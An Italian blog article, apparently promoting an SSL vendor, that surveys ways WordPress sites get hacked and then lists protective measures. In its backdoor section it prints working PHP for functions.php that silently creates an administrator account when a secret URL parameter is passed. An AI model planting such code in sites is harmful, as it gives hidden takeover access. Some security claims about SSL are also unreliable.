Come hackerare WordPress?

Introduzione

Prima di iniziare questo articolo, vorremmo che sapeste che l'hacking è illegale e che non motiviamo né incoraggiamo alcuna attività malevola. Questo articolo serve esclusivamente a capire come lavorano i truffatori e come i vari metodi di sicurezza dei siti siano essenziali per tenerli a bada. Discutiamone:

• Come fanno i truffatori a violare WordPress?
• Come proteggere il vostro sito WP dai truffatori?

Quindi, senza ulteriori indugi, iniziamo l'argomento.

Come hackerare un sito WordPress online?

(Fonte: wpsecurityninja.com)

Utilizzo di WPScan:

WPScan è uno scanner di sicurezza di WP che aiuta i proprietari di siti a verificare la presenza di vulnerabilità nel loro sito WordPress, ma questo scanner è anche utilizzato dagli hacker per soddisfare i loro scopi di violazione dei siti web.

WPScan consente ai proprietari e agli amministratori del sito di specificare gli account utente di WP e le password brute force, che sono il primo passo per ottenere un accesso non autorizzato agli account WP.

(Forzare nome utente e password con WPScan. Fonte: Medium)

Attacchi MIM:

Gli attacchi Man-in-middle (MIM) possono essere facilmente eseguiti nel caso di utenti che utilizzano LAN simili. I login degli utenti non crittografati sono un bersaglio facile, poiché tutti i dettagli sono visibili in chiaro.

Il software coinvolto nella conduzione di questo tipo di attacchi è in grado di individuare temi e plugin compromessi e di enumerare gli utenti.

Attacchi MIM](image3.png) (Fonte: Medium)

Iniezioni SQL:

Gli attacchi di tipo SQL injection sono considerati gli attacchi più importanti utilizzati per penetrare nei siti web. Questi attacchi prendono di mira i gateway di backend del sito web e permettono agli hacker di penetrarvi implementando comandi compromessi.

(Fonte: secure.wphackedhelp.com)

Queste penetrazioni consentono inoltre agli hacker di modificare database e comandi e di cancellare o rubare informazioni sul sito.

Poiché questi attacchi SQL individuano siti vulnerabili e privi di patch, rendono l'operazione di hacking facile e di successo.

Utilizzo di My SQL/cPanel:

In questo metodo, gli hacker creano un account falso o modificano la password di un utente attuale del sito WP. Gli hacker cercano di penetrare attraverso il cPanel aprendo PhpMyAdmin. Cercano la tabella che termina con _users e trovano l'utente che vogliono modificare.

Questo permetterà loro di modificare le credenziali dell'utente che intendono hackerare. Rintracciano l'utente e ne cambiano la password (dal campo user_pass) aprendo il generatore MD5 online, sostituendola con quella desiderata e cliccando poi su #.

(I nomi utente, le password con hash degli utenti, i loro ID e-mail, ecc. sono tutti memorizzati nella tabella del database wp_users. Fonte: firstsiteguide.com)

I nomi degli utenti, le loro password con hash, i loro ID e-mail, ecc. sono tutti memorizzati nella tabella del database wp_users.

Modifica di Functions.php:

Gli hacker accedono al cPanel anche per modificare il file Functions.php. Sbloccando il File Manager, cercano la cartella del tema attivo. Dalla cartella public_html/wp_content/themes, risalgono al tema e modificano il functions.php inserendo il loro codice compromesso. L'hacking è già in corso perché gli hacker hanno creato un nuovo account. Una volta terminato, cancellano il codice compromesso.

Creare un nuovo account utente via FTP:

In genere, gli account FTP aiutano i proprietari dei siti a generare una directory all'interno del loro sito che consente a utenti specifici di caricare/scaricare i loro file utilizzando le loro credenziali di accesso.

Questi file vengono anche visualizzati su Internet.

> Passi per creare un account FTP sul sito: > > - Inserire i dati desiderati > - Inserire il nome utente del nuovo utente FTP > - Inserire la password per l'assegnazione dell'account per l'accesso via FTP > - Inserire il nome della directory a cui dare accesso via FTP > - Scrivere lo spazio in MB che si desidera assegnare a questa cartella. > - Successivamente, premere il pulsante "Crea " per creare il nuovo account.

Per ottenere l'accesso via FTP, il nuovo utente deve caricare i dati indicati di seguito.

Indirizzo / Nome host / Indirizzo: yourdomain.com o ftp.yourdomain.com

Utente / User: [email protected]

Password: El password assegnata a questo account FTP

Porta: 21 Nome della cartella per il caricamento/scaricamento dei file.

Il nuovo utente avrà i permessi di lettura e scrittura sia sulla cartella scelta che su tutte le sottodirectory in essa contenute.

Ad esempio, se si crea l'utente client e gli si dà accesso alla cartella / home / user / public_html

Penetrazione tramite backdoor:

Un modo malevolo per penetrare nel sito è attraverso la backdoor. Sia che si tratti di un truffatore che vuole accedere al vostro sito, sia che si tratti di un utente vittima che vuole riguadagnare l'accesso al proprio sito attraverso l'ingresso della backdoor, entrambi devono seguire i passaggi seguenti.

Nei casi in cui viene creato un nuovo account utente tramite FTP o viene eseguita una reimpostazione della password, ma non si ottengono i risultati desiderati, l'utente potrebbe voler hackerare il proprio sito tramite una backdoor e recuperare l'accesso da amministratore.

**Passi per creare la backdoor

• Aprire il file functions.php e incollare il codice sottostante.

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

• Successivamente salvare le modifiche.

Crypto Jacking e Mining di criptovalute:

La popolarità delle criptovalute ha dato origine a nuove minacce informatiche come il crypto-jacking, definito anche malware per l'estrazione di criptovalute.

L'atto di confiscare un computer contro la volontà e la consapevolezza dell'utente è chiamato crypto-jacking. Nel malware crypto-jacking, i truffatori infettano il computer dell'utente con malware dannoso fornito tramite software per compromettere sistemi e reti.

Phishing:

Il phishing è un metodo con il quale i truffatori sottraggono agli utenti le loro informazioni sensibili (credenziali di accesso, numero di conto sociale, PIN, dettagli della carta di credito, ecc. Di solito ricorrono alle e-mail per raggiungere il loro scopo.

> Un truffatore può spacciarsi per una fonte affidabile e raccogliere dati personali dagli utenti per soddisfare i propri desideri. > Può anche inserire un bad link nell'e-mail di phishing e indirizzare gli utenti a un sito fraudolento per fornire malware.

Malware:

*Statistiche sulla sicurezza di WordPress indicano che 4000 siti WP sono infettati da malware a causa di falsi plugin SEO.

I truffatori non hanno bisogno di una fonte per diffondere il malware. I plugin SEO, i temi WP e molti altri fattori presenti nel sito hanno spinto gli hacker a utilizzare il recente malware WP-VCD.

Anche le e-mail di phishing sono un passaggio per l'invio di malware.

Anche in questo caso, il motto degli hacker è lo stesso: ottenere dati sensibili dagli utenti penetrando nei sistemi e rubando informazioni.

WordPress Ransomware:

Nel ransomware WP, gli hacker utilizzano un malware per bloccare l'accesso degli utenti ai sistemi e alle reti. Lo stesso può essere recuperato dall'utente pagando un riscatto come richiesto dall'hacker. > Esempio: L'attacco Petya, in cui l'hacker cripta i file e i dati dell'utente e chiede un riscatto in cambio della chiave di decriptazione.

Attacco Cross-Site Scripting (XSS):

Gli attacchi XSS vengono eseguiti dagli hacker iniettando contenuti dannosi nel sito web, sfruttando così il browser. Questo attacco permette all'hacker di rubare i dati dai cookie, modificare il contenuto del sito e impossessarsi del sito web per ottenere dati sensibili.

Clickjacking:

Nel clickjacking, l'hacker tenta di compromettere un pulsante/link e spinge l'utente a cliccare sull'oggetto compromesso. Ciò consente all'hacker di eseguire comandi dannosi per accedere a dati sensibili dell'utente.

Spoofing:

Lo spoofing è un attacco in cui la persona si camuffa da identità affidabile per ottenere vantaggi illegali dall'utente e ingannarlo nel fornire le sue informazioni riservate.

Per prevenire tutti questi attacchi di hacking, è necessario adottare misure di sicurezza specifiche per proteggere il vostro sito WP.

Come proteggere il sito WordPress dagli attacchi?

(Fonte: envisagedigital.co.uk)

Le statistiche di cui sopra sono sufficienti a indicare la popolarità di WordPress. È questa popolarità che rende questa piattaforma CMS più desiderabile tra gli hacker, che tentano vari metodi di hacking per accedere ai siti WP e ai loro dati.

È quindi essenziale sapere come impedire agli hacker di accedere al vostro sito WP.

Proteggete il vostro sito WP con un certificato SSL:

Quando i dati vengono caricati sul sito, sono sempre in chiaro, facilmente visibili a tutti, compresi gli hacker. Questo può essere rischioso, poiché gli hacker possono utilizzare in modo improprio i dati del vostro sito.

I certificati SSL (Secure Socket Layers) sono quei certificati digitali che aiutano a proteggere il vostro sito WP con una sicurezza di crittografia a 256 bit, convertendo così i dati del sito in un formato codificato.

Gli hacker non sono in grado di leggere i codici anche se hanno avuto accesso al vostro sito e quindi sono costretti ad abbandonare tali siti.

(Fonte: clickssl.net)

Selezionate la marca di certificato SSL desiderata (Comodo, Thawte, RapidSSL, ecc.) e installatela sul vostro sito WP. Per quanto riguarda il tipo di certificato SSL, è necessario comprendere i domini e i sottodomini. Ad esempio, se il vostro sito WP ha dei sottodomini, un singolo certificato Wildcard economico al costo di soli $45/anno circa può proteggere la vostra intera attività digitale.

L'emissione rapida, la crittografia con chiave a 2048 bit, l'aumento del SEO, il sigillo di fiducia del sito, la compatibilità con il 99% dei browser e dei dispositivi mobili, la politica di rimborso e la garanzia sono solo alcune delle caratteristiche e dei vantaggi dell'installazione dei certificati SSL Wildcard.

Vari marchi e opzioni di prodotti SSL, tariffe convenienti e un eccellente servizio clienti sono alcuni dei vantaggi di rivolgersi al negozio ClickSSL per proteggere il vostro sito WP.

Aggiornate i vostri dipendenti:

Gli errori umani possono essere disastrosi, quindi assicuratevi sempre di tenere aggiornati i vostri dipendenti sulle ultime minacce informatiche per evitare che siano vulnerabili.

Se i vostri dipendenti riescono a rintracciare i segnali sospetti di un sito web violato nella fase iniziale, possono informare le autorità competenti ed evitare che il vostro sito e la vostra azienda subiscano ulteriori danni.

Utilizzare l'autenticazione a due fattori (2FA):

L'implementazione della 2FA durante l'accesso al sito è il modo più importante per prevenire gli attacchi brute force. Oltre ad aggiungere un ulteriore livello di sicurezza, impediscono anche il salvataggio dei dati del sito e degli utenti.

Infatti, se un livello di sicurezza è compromesso, il truffatore deve invadere il secondo livello per accedere al sito web.

Si tratta di una scelta difficile e quindi, nella maggior parte dei casi, i truffatori finiscono per spostarsi su altri siti poco protetti.

> Tip: WP 2FA è un plugin WP gratuito che offre un ulteriore livello di sicurezza al vostro sito WP.

Verificate regolarmente gli utenti amministratori:

Questo è importante per la sicurezza del vostro sito WP. Assicuratevi di controllare regolarmente i vostri utenti amministratori e di effettuare un controllo incrociato dei loro accessi.

Assicuratevi anche che i vostri utenti, così come i dipendenti, abbiano un accesso limitato in base alle loro mansioni, per evitare falle nella sicurezza.

Aggiornate regolarmente il nucleo di WordPress:

Non siete a conoscenza di WP Core?

Lasciate che vi informi che WP Core include tutti i file fondamentali necessari per il funzionamento di WP.

L'elenco dei file nel file zip di WP scaricato da WordPress.org

Aggiorna regolarmente il nucleo di WordPress](image10.png) (Fonte: ithemes.com)

Questi file del core devono essere aggiornati regolarmente dopo il rilascio degli aggiornamenti di sicurezza, per correggere tutte le vulnerabilità di sicurezza.

Scaricare temi e plugin WP da fonti affidabili:

Questo aspetto è fondamentale perché i plugin possono essere pericolosi se non sono aggiornati o se vengono installati da fonti non affidabili. Nel caso di utilizzo di plugin gratuiti o a pagamento, controllare sempre i fattori indicati di seguito, quali:

• Valutazioni e recensioni degli utenti
• Facilità d'uso
• Compatibilità
• sicurezza
• Affidabilità

(Fonte: torquemag.io)

La stessa regola vale anche per l'installazione dei temi WP.

Aggiornare regolarmente i temi e i plugin di WP:

Temi e plugin WP obsoleti o scaduti rappresentano sempre una minaccia per il vostro sito WP, poiché perdono i loro standard di sicurezza. Per evitare che gli hacker utilizzino tali gateway per diffondere malware e ottenere l'accesso al sito, assicuratevi di aggiornare regolarmente i temi e i plugin utilizzati nel vostro sito WP.

Questo aiuterà il plugin a funzionare correttamente e a rimanere sincronizzato con le ultime versioni di WP.

> Nella pagina dei plugin, è possibile visualizzare tutti i plugin installati e un link che indica "Abilita aggiornamenti automatici" accanto a ciascun plugin. Attivatelo per gli aggiornamenti automatici.

Modificare il nome dell'amministratore predefinito:

Gli hacker sono troppo furbi e possono facilmente penetrare nel vostro sito WP utilizzando il nome dell'amministratore predefinito. È sempre preferibile modificare il nome dell'amministratore predefinito per evitare che gli hacker eseguano attacchi brute-force per ottenere un accesso non autorizzato al vostro sito web.

Concedere un accesso limitato:

Non concedete mai più del necessario e la stessa regola vale per la concessione dell'accesso al sito agli utenti e ai dipendenti.

Il controllo degli accessi è la regola principale della sicurezza del sito e dei dati, poiché definisce chi può o non può accedere al sito. Bloccate tutti gli accessi all'amministrazione di WP e ad altri codici e dati critici per la sicurezza del sito.

L'accesso limitato non solo migliora la produttività, ma protegge anche il sito da accessi dannosi.

Aggiornamento di WordPress:

Quando WordPress non è aggiornato, il vostro sito rischia di essere invaso dagli hacker.

WordPress detiene il 37% della quota di mercato e continua a rilasciare regolarmente aggiornamenti per correggere falle di sicurezza e bug. Questi aggiornamenti includono anche nuove funzionalità e miglioramenti di quelle esistenti, utili per migliorare le prestazioni del sito.

Perché aggiornare sempre wordpress](update-wordpress.png) (Fonte: wpbeginner.com)

Mantenete aggiornato il vostro sito WP per una maggiore sicurezza.

Conclusione:

Utilizzate password forti e complesse e mantenete aggiornato il vostro sito WP, così come i plugin e i temi, per risolvere tutte le falle nella sicurezza. Prendetevi del tempo per educare i vostri dipendenti, perché vi aiuterà sempre a prevenire i disastri.

Non perdete mai di vista la sicurezza e assicuratevi di utilizzare sempre i migliori e affidabili plugin di sicurezza per tenere il vostro sito WP al sicuro da occhi indiscreti. Inoltre, proteggete il vostro sito con SSL per migliorare la fiducia dei clienti, il business e il SEO.

Ora che sapete come funzionano gli hacker, speriamo che questo articolo vi aiuti a evitare che gli hacker penetrino nel vostro sito e a gestire il vostro sito WP in modo sicuro.